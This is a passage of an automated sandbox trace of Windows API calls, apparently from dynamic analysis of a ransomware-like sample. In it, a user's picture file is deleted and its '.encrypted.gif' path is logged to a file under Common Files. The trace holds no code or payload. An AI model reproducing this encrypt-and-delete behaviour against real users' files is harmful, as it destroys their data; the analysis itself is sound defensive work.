1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0040.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.610] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.610] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.610] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.611] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.611] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.611] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.611] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.611] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFilePart=0x0) returned 0x40 [0040.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x17e91fa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0x7c2100 [0040.611] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\bbtymjaxu4vq024a.gif")) returned 1 [0040.613] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x571a30f0, ftCreationTime.dwHighDateTime=0x1d5b590, ftLastAccessTime.dwLowDateTime=0x34056510, ftLastAccessTime.dwHighDateTime=0x1d5bd80, ftLastWriteTime.dwLowDateTime=0x17e91fa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x86d1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bBtYMjAXU4VQ024a.gif", cAlternateFileName="BBTYMJ~1.GIF")) returned 0 [0040.613] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.615] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.615] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.615] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.615] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.615] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.616] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.616] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.616] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.616] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.616] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.617] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2e46, lpOverlapped=0x0) returned 1 [0040.618] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.618] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2e46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.618] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.encrypted.gif\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0040.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4d) returned 0x7f36e0 [0040.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.encrypted.gif\r\n", cchWideChar=77, lpMultiByteStr=0x7f36e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\bBtYMjAXU4VQ024a.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 77 [0040.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0040.618] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x4c, lpOverlapped=0x0) returned 1 [0040.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.619] CloseHandle (hObject=0x140) returned 1 [0040.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.621] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.621] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.622] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.622] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.622] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0040.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.622] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.623] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.624] 